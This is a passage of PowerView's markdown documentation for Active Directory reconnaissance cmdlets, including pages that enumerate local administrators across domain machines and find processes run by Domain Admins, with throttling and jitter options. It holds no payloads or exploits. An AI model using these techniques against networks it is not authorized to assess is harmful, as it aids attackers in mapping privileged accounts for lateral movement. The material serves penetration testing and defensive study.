RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/ConvertFrom-UACValue.md",
    "content": "# ConvertFrom-UACValue\r\n\r\n## SYNOPSIS\r\nConverts a UAC int value to human readable form.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nConvertFrom-UACValue [-Value] <Int32> [-ShowAll]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function will take an integer that represents a User Account\r\nControl (UAC) binary blob and will covert it to an ordered\r\ndictionary with each bitwise value broken out.\r\nBy default only values\r\nset are displayed- the -ShowAll switch will display all values with\r\na + next to the ones set.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nConvertFrom-UACValue -Value 66176\r\n```\r\n\r\nName                           Value\r\n----                           -----\r\nENCRYPTED_TEXT_PWD_ALLOWED     128\r\nNORMAL_ACCOUNT                 512\r\nDONT_EXPIRE_PASSWORD           65536\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainUser harmj0y | ConvertFrom-UACValue\r\n```\r\n\r\nName                           Value\r\n----                           -----\r\nNORMAL_ACCOUNT                 512\r\nDONT_EXPIRE_PASSWORD           65536\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll\r\n```\r\n\r\nName                           Value\r\n----                           -----\r\nSCRIPT                         1\r\nACCOUNTDISABLE                 2\r\nHOMEDIR_REQUIRED               8\r\nLOCKOUT                        16\r\nPASSWD_NOTREQD                 32\r\nPASSWD_CANT_CHANGE             64\r\nENCRYPTED_TEXT_PWD_ALLOWED     128\r\nTEMP_DUPLICATE_ACCOUNT         256\r\nNORMAL_ACCOUNT                 512+\r\nINTERDOMAIN_TRUST_ACCOUNT      2048\r\nWORKSTATION_TRUST_ACCOUNT      4096\r\nSERVER_TRUST_ACCOUNT           8192\r\nDONT_EXPIRE_PASSWORD           65536+\r\nMNS_LOGON_ACCOUNT              131072\r\nSMARTCARD_REQUIRED             262144\r\nTRUSTED_FOR_DELEGATION         524288\r\nNOT_DELEGATED                  1048576\r\nUSE_DES_KEY_ONLY               2097152\r\nDONT_REQ_PREAUTH               4194304\r\nPASSWORD_EXPIRED               8388608\r\nTRUSTED_TO_AUTH_FOR_DELEGATION 16777216\r\nPARTIAL_SECRETS_ACCOUNT        67108864\r\n\r\n## PARAMETERS\r\n\r\n### -Value\r\nSpecifies the integer UAC value to convert.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: UAC, useraccountcontrol\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: 0\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ShowAll\r\nSwitch.\r\nSignals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### Int\r\n\r\nAccepts an integer representing a UAC binary blob.\r\n\r\n## OUTPUTS\r\n\r\n### System.Collections.Specialized.OrderedDictionary\r\n\r\nAn ordered dictionary with the converted UAC fields.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)\r\n\r\n"
  },
  {
    "path": "docs/Recon/ConvertTo-SID.md",
    "content": "# ConvertTo-SID\r\n\r\n## SYNOPSIS\r\nConverts a given user/group name to a security identifier (SID).\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Convert-ADName, Get-DomainObject, Get-Domain\r\n\r\n## SYNTAX\r\n\r\n```\r\nConvertTo-SID [-ObjectName] <String[]> [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nConverts a \"DOMAIN\\username\" syntax to a security identifier (SID)\r\nusing System.Security.Principal.NTAccount's translate function.\r\nIf alternate\r\ncredentials are supplied, then Get-ADObject is used to try to map the name\r\nto a security identifier.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nConvertTo-SID 'DEV\\dfm'\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n'DEV\\dfm','DEV\\krbtgt' | ConvertTo-SID\r\n```\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\n'TESTLAB\\dfm' | ConvertTo-SID -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ObjectName\r\nThe user/group name to convert, can be 'user' or 'DOMAIN\\user' format.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Name, Identity\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the translation, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to for the translation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nSpecifies an alternate credential to use for the translation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nAccepts one or more username specification strings on the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n### String\r\n\r\nA string representing the SID of the translated name.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Export-PowerViewCSV.md",
    "content": "# Export-PowerViewCSV\r\n\r\n## SYNOPSIS\r\nConverts objects into a series of comma-separated (CSV) strings and saves the\r\nstrings in a CSV file in a thread-safe manner.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nExport-PowerViewCSV -InputObject <PSObject[]> [-Path] <String> [[-Delimiter] <Char>] [-Append]\r\n```\r\n\r\n## DESCRIPTION\r\nThis helper exports an -InputObject to a .csv in a thread-safe manner\r\nusing a mutex.\r\nThis is so the various multi-threaded functions in\r\nPowerView has a thread-safe way to export output to the same file.\r\nUses .NET IO.FileStream/IO.StreamWriter objects for speed.\r\n\r\nOriginally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nGet-DomainUser | Export-PowerViewCSV -Path \"users.csv\"\r\n```\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nGet-DomainUser | Export-PowerViewCSV -Path \"users.csv\" -Append -Delimiter '|'\r\n```\r\n\r\n## PARAMETERS\r\n\r\n### -InputObject\r\nSpecifies the objects to export as CSV strings.\r\n\r\n```yaml\r\nType: PSObject[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nSpecifies the path to the CSV output file.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delimiter\r\nSpecifies a delimiter to separate the property values.\r\nThe default is a comma (,)\r\n\r\n```yaml\r\nType: Char\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: ,\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Append\r\nIndicates that this cmdlet adds the CSV output to the end of the specified file.\r\nWithout this parameter, Export-PowerViewCSV replaces the file contents without warning.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### PSObject\r\n\r\nAccepts one or more PSObjects on the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://poshcode.org/1590\r\nhttp://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590\r\nhttp://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-DomainLocalGroupMember.md",
    "content": "# Find-DomainLocalGroupMember\r\n\r\n## SYNOPSIS\r\nEnumerates the members of specified local group (default administrators)\r\nfor all the targeted machines on the current (or specified) domain.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n```\r\nFind-DomainLocalGroupMember [[-ComputerName] <String[]>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]\r\n [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-GroupName <String>] [-Method <String>]\r\n [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]\r\n [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates all machines on the current (or specified) domain\r\nusing Get-DomainComputer, and enumerates the members of the specified local\r\ngroup (default of Administrators) for each machine using Get-NetLocalGroupMember.\r\nBy default, the API method is used, but this can be modified with '-Method winnt'\r\nto use the WinNT service provider.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-DomainLocalGroupMember\r\n```\r\n\r\nEnumerates the local group memberships for all reachable machines in the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-DomainLocalGroupMember -Domain dev.testlab.local\r\n```\r\n\r\nEnumerates the local group memberships for all reachable machines the dev.testlab.local domain.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-DomainLocalGroupMember -Domain testlab.local -Credential $Cred\r\n\r\nEnumerates the local group memberships for all reachable machines the dev.testlab.local\r\ndomain using the alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies an array of one or more hosts to enumerate, passable on the pipeline.\r\nIf -ComputerName is not passed, the default behavior is to enumerate all machines\r\nin the domain returned by Get-DomainComputer.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DNSHostName\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerDomain\r\nSpecifies the domain to query for computers, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerLDAPFilter\r\nSpecifies an LDAP query string that is used to search for computer objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSearchBase\r\nSpecifies the LDAP source to search through for computers,\r\ne.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\".\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerOperatingSystem\r\nSearch computers with a specific operating system, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: OperatingSystem\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerServicePack\r\nSearch computers with a specific service pack, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ServicePack\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ComputerSiteName\r\nSearch computers in the specific AD Site name, wildcards accepted.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: SiteName\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -GroupName\r\nThe local group name to query for users.\r\nIf not given, it defaults to \"Administrators\".\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Administrators\r\nAccept pipeline input: True (ByPropertyName)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Method\r\nThe collection method to use, defaults to 'API', also accepts 'WinNT'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: CollectionMethod\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: API\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain and target systems.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Delay\r\nSpecifies the delay (in seconds) between enumerating hosts, defaults to 0.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Jitter\r\nSpecifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3\r\n\r\n```yaml\r\nType: Double\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0.3\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Threads\r\nThe number of threads to use for user searching, defaults to 20.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 20\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.LocalGroupMember.API\r\n\r\nCustom PSObject with translated group property fields from API results.\r\n\r\nPowerView.LocalGroupMember.WinNT\r\n\r\nCustom PSObject with translated group property fields from WinNT results.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-DomainObjectPropertyOutlier.md",
    "content": "# Find-DomainObjectPropertyOutlier\r\n\r\n## SYNOPSIS\r\nFinds user/group/computer objects in AD that have 'outlier' properties set.\r\n\r\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer, Get-ForestSchemaClass\r\n\r\n## SYNTAX\r\n\r\n### ClassName (Default)\r\n```\r\nFind-DomainObjectPropertyOutlier [-ClassName] <String> [-ReferencePropertySet <String[]>] [-Domain <String>]\r\n [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n### ReferenceObject\r\n```\r\nFind-DomainObjectPropertyOutlier [-ReferencePropertySet <String[]>] -ReferenceObject <PSObject>\r\n [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nEnumerates the schema for the specified -ClassName (if passed) by using Get-ForestSchemaClass.\r\nIf a -ReferenceObject is passed, the class is extracted from the passed object.\r\nA 'reference' set of property names is then calculated, either from a standard set preserved\r\nfor user/group/computers, or from the array of names passed to -ReferencePropertySet, or\r\nfrom the property names of the passed -ReferenceObject.\r\nThese property names are substracted\r\nfrom the master schema propertyu name list to retrieve a set of 'non-standard' properties.\r\nEvery user/group/computer object (depending on determined class) are enumerated, and for each\r\nobject, if the object has a 'non-standard' property set, the object samAccountName, property\r\nname, and property value are output to the pipeline.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-DomainObjectPropertyOutlier -User\r\n```\r\n\r\nEnumerates users in the current domain with 'outlier' properties filled in.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-DomainObjectPropertyOutlier -Group -Domain external.local\r\n```\r\n\r\nEnumerates groups in the external.local forest/domain with 'outlier' properties filled in.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nGet-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier\r\n```\r\n\r\nEnumerates computers in the current domain with 'outlier' properties filled in.\r\n\r\n## PARAMETERS\r\n\r\n### -ClassName\r\nSpecifies the AD object class to find property outliers for, 'user', 'group', or 'computer'.\r\nIf -ReferenceObject is specified, this will be automatically extracted, if possible.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: ClassName\r\nAliases: Class\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ReferencePropertySet\r\nSpecifies an array of property names to diff against the class schema.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ReferenceObject\r\nSpecicifes the PowerView user/group/computer object to extract property names\r\nfrom to use as the reference set.\r\n\r\n```yaml\r\nType: PSObject\r\nParameter Sets: ReferenceObject\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: True (ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the query, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -LDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory objects.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchBase\r\nThe LDAP source to search through, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: ADSPath\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n### PowerView.PropertyOutlier\r\n\r\nCustom PSObject with translated object property outliers.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Find-DomainProcess.md",
    "content": "# Find-DomainProcess\r\n\r\n## SYNOPSIS\r\nSearches for processes on the domain using WMI, returning processes\r\nthat match a particular user specification or process name.\r\n\r\nThanks to @paulbrandau for the approach idea.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Get-WMIProcess, New-ThreadedFunction\r\n\r\n## SYNTAX\r\n\r\n### None (Default)\r\n```\r\nFind-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]\r\n [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-StopOnSuccess] [-Delay <Int32>]\r\n [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n### TargetProcess\r\n```\r\nFind-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-ProcessName <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n### UserIdentity\r\n```\r\nFind-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-UserIdentity <String[]>] [-UserGroupIdentity <String[]>] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n### TargetUser\r\n```\r\nFind-DomainProcess [[-ComputerName] <String[]>] [-Domain <String>] [-ComputerDomain <String>]\r\n [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerUnconstrained]\r\n [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>] [-ComputerSiteName <String>]\r\n [-UserIdentity <String[]>] [-UserDomain <String>] [-UserLDAPFilter <String>] [-UserSearchBase <String>]\r\n [-UserGroupIdentity <String[]>] [-UserAdminCount] [-Server <String>] [-SearchScope <String>]\r\n [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]\r\n [-StopOnSuccess] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function enumerates all machines on the current (or specified) domain\r\nusing Get-DomainComputer, and queries the domain for users of a specified group\r\n(default 'Domain Admins') with Get-DomainGroupMember.\r\nThen for each server the\r\nfunction enumerates any current processes running with Get-WMIProcess,\r\nsearching for processes running under any target user contexts or with the\r\nspecified -ProcessName.\r\nIf -Credential is passed, it is passed through to\r\nthe underlying WMI commands used to enumerate the remote machines.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nFind-DomainProcess\r\n```\r\n\r\nSearches for processes run by 'Domain Admins' by enumerating every computer in the domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\nFind-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local\r\n```\r\n\r\nEnumerates Windows 7 computers in dev.testlab.local and returns any processes being run by\r\nprivileged users in dev.testlab.local.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nFind-DomainProcess -ProcessName putty.exe\r\n```\r\n\r\nSearchings for instances of putty.exe running on the current domain.\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nFind-DomainProcess -Domain testlab.local -Credential $Cred\r\n\r\nSearches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### 